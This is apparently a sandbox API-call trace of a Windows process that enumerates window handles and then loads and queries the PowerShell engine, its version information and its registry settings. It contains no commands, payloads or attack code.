	[0856.422] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd0c
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc9c
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc74
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc1c
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc08
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xabc
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x24c
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbb0
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbfc
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb10
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x374
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x368
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb28
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xae8
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb14
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x95c
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa8c
	[0856.423] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x46c
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb3c
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa90
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xad0
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa9c
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xaa0
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb1c
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7e0
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa74
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x694
	[0856.424] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa28
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x9b0
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x8d8
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x940
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x93c
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4ec
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x150
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x720
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x3c4
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7d4
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6c8
	[0856.425] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb54
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb54
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6bc
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb5c
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x838
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x818
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x5b8
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x494
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ec
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x440
	[0856.426] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x7e8
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x730
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2c8
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x31c
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x330
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x128
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x5c8
	[0856.427] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6f8
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x358
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x73c
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb0
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x250
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x240
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x790
	[0856.428] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x61c
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x568
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x538
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x540
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x79c
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4e0
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0856.429] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x778
	[0856.433] WerSetFlags () returned 0x0
	[0857.825] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0857.825] CoTaskMemFree (pv=0x0) 
	[0857.826] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xee008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xee000 | out: pulNumLanguages=0xee008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xee000) returned 1
	[0857.826] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xee008, pwszLanguagesBuffer=0x2b56e28, pcchLanguagesBuffer=0xee000 | out: pulNumLanguages=0xee008, pwszLanguagesBuffer=0x2b56e28, pcchLanguagesBuffer=0xee000) returned 1
	[0857.832] CoTaskMemAlloc (cb=0x24) returned 0x36a610
	[0857.832] GetUserDefaultLocaleName (in: lpLocaleName=0x36a610, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0857.833] CoTaskMemFree (pv=0x36a610) 
	[0858.879] CoTaskMemAlloc (cb=0x104) returned 0x2a9770
	[0858.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a9770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.880] CoTaskMemFree (pv=0x2a9770) 
	[0858.882] CoTaskMemAlloc (cb=0x104) returned 0x2a9770
	[0858.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a9770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.882] CoTaskMemFree (pv=0x2a9770) 
	[0858.884] CoTaskMemAlloc (cb=0x104) returned 0x2a9770
	[0858.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a9770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.884] CoTaskMemFree (pv=0x2a9770) 
	[0858.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeda70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.896] SetErrorMode (uMode=0x1) returned 0x1
	[0858.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedc80 | out: lpFileInformation=0xedc80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0858.896] SetErrorMode (uMode=0x1) returned 0x1
	[0858.896] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedef0 | out: lpdwHandle=0xedef0) returned 0x94c
	[0860.422] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b5a6b8 | out: lpData=0x2b5a6b8) returned 1
	[0860.423] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xede68, puLen=0xede60 | out: lplpBuffer=0xede68*=0x2b5a754, puLen=0xede60) returned 1
	[0860.424] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a830, puLen=0xeddd0) returned 1
	[0860.424] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0860.424] CoTaskMemAlloc (cb=0x2e) returned 0x369910
	[0860.424] lstrcpyW (in: lpString1=0x369910, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0860.424] CoTaskMemFree (pv=0x369910) 
	[0860.424] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a884, puLen=0xeddd0) returned 1
	[0860.424] lstrlenW (lpString="System.Management.Automation") returned 28
	[0860.424] CoTaskMemAlloc (cb=0x3c) returned 0x2d4b20
	[0860.424] lstrcpyW (in: lpString1=0x2d4b20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0860.424] CoTaskMemFree (pv=0x2d4b20) 
	[0860.424] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a8e0, puLen=0xeddd0) returned 1
	[0860.424] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0860.424] CoTaskMemAlloc (cb=0x20) returned 0x36a670
	[0860.424] lstrcpyW (in: lpString1=0x36a670, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0860.424] CoTaskMemFree (pv=0x36a670) 
	[0860.424] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a920, puLen=0xeddd0) returned 1
	[0860.424] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0860.424] CoTaskMemAlloc (cb=0x44) returned 0x2d4b20
	[0860.425] lstrcpyW (in: lpString1=0x2d4b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0860.425] CoTaskMemFree (pv=0x2d4b20) 
	[0860.425] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a988, puLen=0xeddd0) returned 1
	[0860.425] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0860.425] CoTaskMemAlloc (cb=0x76) returned 0x3046d0
	[0860.425] lstrcpyW (in: lpString1=0x3046d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0860.425] CoTaskMemFree (pv=0x3046d0) 
	[0860.425] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5aa24, puLen=0xeddd0) returned 1
	[0860.425] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0860.425] CoTaskMemAlloc (cb=0x44) returned 0x2d4b20
	[0860.425] lstrcpyW (in: lpString1=0x2d4b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0860.425] CoTaskMemFree (pv=0x2d4b20) 
	[0860.425] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5aa88, puLen=0xeddd0) returned 1
	[0860.425] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0860.425] CoTaskMemAlloc (cb=0x58) returned 0x2b57e0
	[0860.425] lstrcpyW (in: lpString1=0x2b57e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0860.425] CoTaskMemFree (pv=0x2b57e0) 
	[0860.425] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5ab04, puLen=0xeddd0) returned 1
	[0860.426] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0860.426] CoTaskMemAlloc (cb=0x20) returned 0x36a670
	[0860.426] lstrcpyW (in: lpString1=0x36a670, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0860.426] CoTaskMemFree (pv=0x36a670) 
	[0860.426] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x2b5a7ac, puLen=0xeddd0) returned 1
	[0860.426] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0860.426] CoTaskMemAlloc (cb=0x66) returned 0x3683c0
	[0860.426] lstrcpyW (in: lpString1=0x3683c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0860.426] CoTaskMemFree (pv=0x3683c0) 
	[0860.426] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x0, puLen=0xeddd0) returned 0
	[0860.426] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x0, puLen=0xeddd0) returned 0
	[0860.426] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xeddd8, puLen=0xeddd0 | out: lplpBuffer=0xeddd8*=0x0, puLen=0xeddd0) returned 0
	[0860.426] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedda8, puLen=0xedda0 | out: lplpBuffer=0xedda8*=0x2b5a754, puLen=0xedda0) returned 1
	[0860.426] CoTaskMemAlloc (cb=0x204) returned 0x2fc760
	[0860.426] VerLanguageNameW (in: wLang=0x0, szLang=0x2fc760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0860.427] CoTaskMemFree (pv=0x2fc760) 
	[0860.427] VerQueryValueW (in: pBlock=0x2b5a6b8, lpSubBlock="\\", lplpBuffer=0xeddf8, puLen=0xeddf0 | out: lplpBuffer=0xeddf8*=0x2b5a6e0, puLen=0xeddf0) returned 1
	[0860.435] CoTaskMemAlloc (cb=0x104) returned 0x36d760
	[0860.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0860.436] CoTaskMemFree (pv=0x36d760) 
	[0860.442] CoTaskMemAlloc (cb=0x104) returned 0x36d760
	[0860.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0860.442] CoTaskMemFree (pv=0x36d760) 
	[0860.447] lstrlenW (lpString="䅁") returned 1
	[0860.460] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xedcc8 | out: phkResult=0xedcc8*=0x2e8) returned 0x0
	[0860.462] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xedcb8 | out: phkResult=0xedcb8*=0x2ec) returned 0x0
	[0860.462] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedd48 | out: phkResult=0xedd48*=0x2f0) returned 0x0
	[0860.467] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedc8c, lpData=0x0, lpcbData=0xedc88*=0x0 | out: lpType=0xedc8c*=0x1, lpData=0x0, lpcbData=0xedc88*=0x56) returned 0x0
	[0860.468] CoTaskMemAlloc (cb=0x5a) returned 0x368350
	[0861.530] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedc5c, lpData=0x368350, lpcbData=0xedc58*=0x56 | out: lpType=0xedc5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xedc58*=0x56) returned 0x0
	[0861.530] CoTaskMemFree (pv=0x368350) 
	[0861.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0861.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0861.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.727] CoTaskMemAlloc (cb=0x104) returned 0x36d760
	[0862.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.727] CoTaskMemFree (pv=0x36d760) 
	[0867.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0867.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0869.522] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0869.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.522] CoTaskMemFree (pv=0x36d870) 
	[0869.524] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0869.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.524] CoTaskMemFree (pv=0x36d870) 
	[0869.555] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0869.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.555] CoTaskMemFree (pv=0x36d870) 
	[0869.556] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0869.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.557] CoTaskMemFree (pv=0x36d870) 
	[0869.557] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0869.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.557] CoTaskMemFree (pv=0x36d870) 
	[0874.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0874.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0874.884] CoTaskMemAlloc (cb=0x104) returned 0x36d870
	[0874.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.884] CoTaskMemFree (pv=0x36d870) 
	[0875.647] CoTaskMemAlloc (cb=0x104) returned 0x36d870
